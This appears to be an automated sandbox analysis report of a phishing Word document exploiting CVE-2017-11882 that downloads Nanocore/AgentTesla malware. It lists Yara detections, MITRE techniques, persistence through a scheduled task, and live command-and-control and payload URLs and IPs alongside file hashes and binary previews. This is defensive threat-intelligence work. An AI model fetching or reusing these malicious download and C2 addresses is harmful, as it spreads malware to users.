ProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: cat464923.exe, 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: smtpsvc.exe, 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2348105483.0000000002491000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY
Source: Yara match	File source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY
Source: Yara match	File source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY
Source: Yara match	File source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY
Source: Yara match	File source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.34e019c.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.4a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.32d019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.33a019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.33547c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.34e47c5.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.335019c.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.32d019c.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution13	Scheduled Task/Job1	Process Injection112	Disable or Modify Tools1	Input Capture11	File and Directory Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Deobfuscate/Decode Files or Information1	LSASS Memory	System Information Discovery13	Remote Desktop Protocol	Input Capture11	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scheduled Task/Job1	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	Security Software Discovery21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing22	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading2	LSA Secrets	Virtualization/Sandbox Evasion21	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion21	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol222	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
NEW ORDER Ref PO-298721.doc	23%	Virustotal		Browse
NEW ORDER Ref PO-298721.doc	34%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\cat464923.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catx[1].exe	100%	Joe Sandbox ML
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	37%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catx[1].exe	37%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Roaming\cat464923.exe	37%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Download
18.0.smtpsvc.exe.400000.4.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
17.0.smtpsvc.exe.400000.2.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
17.0.smtpsvc.exe.400000.4.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
16.2.cat464923.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
5.2.cat464923.exe.400000.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
16.0.cat464923.exe.400000.1.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
5.0.cat464923.exe.400000.1.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
16.0.cat464923.exe.400000.3.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
17.2.smtpsvc.exe.400000.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
18.0.smtpsvc.exe.400000.2.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
5.2.cat464923.exe.4a0000.5.unpack	100%	Avira	TR/NanoCore.fadte	Download File
18.2.smtpsvc.exe.400000.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
5.0.cat464923.exe.400000.3.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File

Domains

Source	Detection	Scanner	Label	Link
carbinz.gq	16%	Virustotal		Browse
tzitziklishop.ddns.net	9%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
tzitziklishop.ddns.net	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://carbinz.gq/modex/catx.exe	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
carbinz.gq	185.239.243.112	true	true	16%, Virustotal, Browse	unknown
tzitziklishop.ddns.net	103.133.106.117	true	true	9%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
tzitziklishop.ddns.net	true	Avira URL Cloud: safe	unknown
http://carbinz.gq/modex/catx.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.%s.comPA	cat464923.exe, 00000005.00000002.2352132844.0000000005800000.00000002.00000001.sdmp, taskeng.exe, 0000000A.00000002.2347261747.0000000001CB0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	cat464923.exe, 00000005.00000002.2352132844.0000000005800000.00000002.00000001.sdmp, taskeng.exe, 0000000A.00000002.2347261747.0000000001CB0000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.239.243.112	carbinz.gq	Moldova Republic of		55933	CLOUDIE-AS-APCloudieLimitedHK	true
103.133.106.117	tzitziklishop.ddns.net	Viet Nam		135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	431710
Start date:	09.06.2021
Start time:	07:47:05
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 39s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	NEW ORDER Ref PO-298721.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@26/14@47/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.2% (good quality ratio 0.2%) Quality average: 75% Quality standard deviation: 0%
HCA Information:	Successful, ratio: 96% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe TCP Packets have been reduced to 100 Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:47:37	API Interceptor	37x Sleep call for process: EQNEDT32.EXE modified
07:47:38	API Interceptor	1882x Sleep call for process: cat464923.exe modified
07:47:43	API Interceptor	3x Sleep call for process: schtasks.exe modified
07:47:44	Task Scheduler	Run new task: SMTP Service path: "C:\Users\user\AppData\Roaming\cat464923.exe" s>$(Arg0)
07:47:45	API Interceptor	214x Sleep call for process: taskeng.exe modified
07:47:45	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
07:47:46	Task Scheduler	Run new task: SMTP Service Task path: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" s>$(Arg0)
07:47:47	API Interceptor	462x Sleep call for process: smtpsvc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.239.243.112	Payment Advice.doc	Get hash	malicious	Browse	carbinz.gq/modex/canux.exe
	Kangean PO.doc	Get hash	malicious	Browse	carbinz.gq/modex/liquidx.exe
	ENQUIRY - J3902 Hollow Section.doc	Get hash	malicious	Browse	vespang.ml/benp/unholy/fadaa/AmhNUkkKoGogl9g.exe
	PO_7067.doc	Get hash	malicious	Browse	vespang.ml/benp/unholy/djj/qTRPobspXvlwT1l.exe
	Ball,Globe,plug valve spec.doc	Get hash	malicious	Browse	vespang.ml/benp/unholy/jap/k0lzSkgsBCEeffT.exe
	Purchase Order.xlsx	Get hash	malicious	Browse	vespang.ml/vanal/tesy.scr
	SwiftMt103.xlsx	Get hash	malicious	Browse	carbinz.gq/modex/kellyx.exe
	RFQ B 11JU2021.doc	Get hash	malicious	Browse	vespang.ml/benp/jam/admin/UKq69QoX4veK4Up.exe
	Ball, Globe, plug, Relief and Check valve Spec..doc	Get hash	malicious	Browse	vespang.ml/benp/jam/omas/skMdx992wfqPuLs.exe
	RFQ1.doc	Get hash	malicious	Browse	carbinz.gq/modex/nzex.exe
	EBE2101320.xlsx	Get hash	malicious	Browse	carbinz.gq/modex/chungx.exe
	Purchase order.doc	Get hash	malicious	Browse	carbinz.gq/modex/kamix.exe
	000367828992.doc	Get hash	malicious	Browse	carbinz.gq/modex/kdotx.exe
	SCAN_20161017_151638921_002.xlsx	Get hash	malicious	Browse	carbinz.gq/modex/templex.exe
	SIGNED CONTRACT.xlsx	Get hash	malicious	Browse	carbinz.gq/modex/kellyx.exe
	lX5zXPa23V.xlsx	Get hash	malicious	Browse	carbinz.gq/modex/sirt.exe
	IQ4lblwCjQ.exe	Get hash	malicious	Browse	vunachiimpex.xyz/buta/vuga.exe
	MADINA GROUP RFQ for PIPES.doc	Get hash	malicious	Browse	vunachiimpex.xyz/cgi/ja/vMGUvT6JSOA3UIz.exe
	new po.xlsx	Get hash	malicious	Browse	carbinz.gq/modex/templex.exe
	PO QT-028564.xlsx	Get hash	malicious	Browse	vunachiimpex.xyz/buta/vuga.exe
103.133.106.117	NEW ORDER (Ref PO-298721).exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
tzitziklishop.ddns.net	NEW ORDER (Ref PO-298721).exe	Get hash	malicious	Browse	103.133.106.117
	plf.exe	Get hash	malicious	Browse	103.89.90.73
	365d37e0_by_Libranalysis.exe	Get hash	malicious	Browse	103.89.90.73
	SWIFT COPY.xlsx	Get hash	malicious	Browse	103.89.90.73
carbinz.gq	Payment Advice.doc	Get hash	malicious	Browse	185.239.243.112
	Kangean PO.doc	Get hash	malicious	Browse	185.239.243.112
	SwiftMt103.xlsx	Get hash	malicious	Browse	185.239.243.112
	RFQ1.doc	Get hash	malicious	Browse	185.239.243.112
	EBE2101320.xlsx	Get hash	malicious	Browse	185.239.243.112
	Purchase order.doc	Get hash	malicious	Browse	185.239.243.112
	000367828992.doc	Get hash	malicious	Browse	185.239.243.112
	SCAN_20161017_151638921_002.xlsx	Get hash	malicious	Browse	185.239.243.112
	SIGNED CONTRACT.xlsx	Get hash	malicious	Browse	185.239.243.112
	lX5zXPa23V.xlsx	Get hash	malicious	Browse	185.239.243.112
	new po.xlsx	Get hash	malicious	Browse	185.239.243.112
	42bceb60_by_Libranalysis.xlsx	Get hash	malicious	Browse	185.239.243.112
	SCAN_20161017_151638921_002.xlsx	Get hash	malicious	Browse	185.239.243.112
	XRFQX#P000001488.xlsx	Get hash	malicious	Browse	185.239.243.112
	Payment Advise.doc	Get hash	malicious	Browse	185.239.243.112
	e6f8edeb_by_Libranalysis.xlsx	Get hash	malicious	Browse	185.239.243.112
	b4b13a17_by_Libranalysis.xlsx	Get hash	malicious	Browse	185.239.243.112
	TT Documents.xlsx	Get hash	malicious	Browse	185.239.243.112
	inv222343322.xlsx	Get hash	malicious	Browse	185.239.243.112
	99feb78a_by_Libranalysis.xlsx	Get hash	malicious	Browse	185.239.243.112

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDIE-AS-APCloudieLimitedHK	Payment Advice.doc	Get hash	malicious	Browse	185.239.243.112
	Kangean PO.doc	Get hash	malicious	Browse	185.239.243.112
	ENQUIRY - J3902 Hollow Section.doc	Get hash	malicious	Browse	185.239.243.112
	PO_7067.doc	Get hash	malicious	Browse	185.239.243.112
	Ball,Globe,plug valve spec.doc	Get hash	malicious	Browse	185.239.243.112
	Purchase Order.xlsx	Get hash	malicious	Browse	185.239.243.112
	SwiftMt103.xlsx	Get hash	malicious	Browse	185.239.243.112
	RFQ B 11JU2021.doc	Get hash	malicious	Browse	185.239.243.112
	Ball, Globe, plug, Relief and Check valve Spec..doc	Get hash	malicious	Browse	185.239.243.112
	RFQ1.doc	Get hash	malicious	Browse	185.239.243.112
	EBE2101320.xlsx	Get hash	malicious	Browse	185.239.243.112
	Purchase order.doc	Get hash	malicious	Browse	185.239.243.112
	000367828992.doc	Get hash	malicious	Browse	185.239.243.112
	SCAN_20161017_151638921_002.xlsx	Get hash	malicious	Browse	185.239.243.112
	SIGNED CONTRACT.xlsx	Get hash	malicious	Browse	185.239.243.112
	lX5zXPa23V.xlsx	Get hash	malicious	Browse	185.239.243.112
	IQ4lblwCjQ.exe	Get hash	malicious	Browse	185.239.243.112
	MADINA GROUP RFQ for PIPES.doc	Get hash	malicious	Browse	185.239.243.112
	new po.xlsx	Get hash	malicious	Browse	185.239.243.112
	PO QT-028564.xlsx	Get hash	malicious	Browse	185.239.243.112
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	2-2.exe	Get hash	malicious	Browse	103.114.107.28
	3-1.exe	Get hash	malicious	Browse	103.114.107.28
	2-3.exe	Get hash	malicious	Browse	103.114.107.28
	3-2.exe	Get hash	malicious	Browse	103.114.107.28
	3-3.exe	Get hash	malicious	Browse	103.114.107.28
	7-3.exe	Get hash	malicious	Browse	103.114.107.28
	7-2.exe	Get hash	malicious	Browse	103.114.107.28
	9-1.exe	Get hash	malicious	Browse	103.114.107.28
	9-2.exe	Get hash	malicious	Browse	103.114.107.28
	9-3.exe	Get hash	malicious	Browse	103.114.107.28
	11-1.exe	Get hash	malicious	Browse	103.114.107.28
	11-3.exe	Get hash	malicious	Browse	103.114.107.28
	13-1.exe	Get hash	malicious	Browse	103.114.107.28
	13-3.exe	Get hash	malicious	Browse	103.114.107.28
	13-2.exe	Get hash	malicious	Browse	103.114.107.28
	15-1.exe	Get hash	malicious	Browse	103.114.107.28
	15-3.exe	Get hash	malicious	Browse	103.114.107.28
	15-2.exe	Get hash	malicious	Browse	103.114.107.28
	17-1.exe	Get hash	malicious	Browse	103.114.107.28
	17-2.exe	Get hash	malicious	Browse	103.114.107.28

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Program Files (x86)\SMTP Service\smtpsvc.exe Download File
Process:	C:\Users\user\AppData\Roaming\cat464923.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	736256
Entropy (8bit):	7.59865760202799
Encrypted:	false
SSDEEP:	6144:x2j8F5ve0At+vWlrOXMRzyeYlDW6PzaIm8MI8x39qflzAQnT6kygum2OMidd8P99:sj8FU9qXKueqZPeLhI8N0MQn5zdd8ld
MD5:	61DE33A77D34A313DF07DC2BDD28140A
SHA1:	2690F84ADB2C6174AAB432A61737CA892AF2D206
SHA-256:	9037AFBF6A54684A77A6D0B204DAA0A843555E01A9BD600545D8AE252B88FAD7
SHA-512:	9AAD4399FB37F78D1E658006EFDFE218607F51D630496CE7FBC1766BDD78B8F360657C8A661CF48602105F5C7D7A9C772180D5307BC3B9D5E2D2DE2CDB24E4C1
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j.`..............0..2...........Q... ...`....@.. ....................................@.................................pQ..O....`..............................8P............................................... ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B.................Q......H...................k....x................................................r...p}......}.....(.......(.......0..?.........{....o....r[..p(....-\.{....o....r[..p(....-E.{....o....r[..p(....-..{....o....r[..p(....-..{....o....r[..p(....+......,..r]..p(....&8.....{....s........=...%.ry..p.%..{....o.....%.r...p.%..{....o.....%.r...p.%..{....o.....%.r...p.%..{....o.....%.r...p.%...{....o.....%..r...p.(.......s......o......o.....r...p(....&...(.......*....0..+.........,..{......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catx[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	736256
Entropy (8bit):	7.59865760202799
Encrypted:	false
SSDEEP:	6144:x2j8F5ve0At+vWlrOXMRzyeYlDW6PzaIm8MI8x39qflzAQnT6kygum2OMidd8P99:sj8FU9qXKueqZPeLhI8N0MQn5zdd8ld
MD5:	61DE33A77D34A313DF07DC2BDD28140A
SHA1:	2690F84ADB2C6174AAB432A61737CA892AF2D206
SHA-256:	9037AFBF6A54684A77A6D0B204DAA0A843555E01A9BD600545D8AE252B88FAD7
SHA-512:	9AAD4399FB37F78D1E658006EFDFE218607F51D630496CE7FBC1766BDD78B8F360657C8A661CF48602105F5C7D7A9C772180D5307BC3B9D5E2D2DE2CDB24E4C1
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Reputation:	low
IE Cache URL:	http://carbinz.gq/modex/catx.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j.`..............0..2...........Q... ...`....@.. ....................................@.................................pQ..O....`..............................8P............................................... ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B.................Q......H...................k....x................................................r...p}......}.....(.......(.......0..?.........{....o....r[..p(....-\.{....o....r[..p(....-E.{....o....r[..p(....-..{....o....r[..p(....-..{....o....r[..p(....+......,..r]..p(....&8.....{....s........=...%.ry..p.%..{....o.....%.r...p.%..{....o.....%.r...p.%..{....o.....%.r...p.%..{....o.....%.r...p.%...{....o.....%..r...p.(.......s......o......o.....r...p(....&...(.......*....0..+.........,..{......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4C37CD3-97C0-4A14-814E-1968BCE52029}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

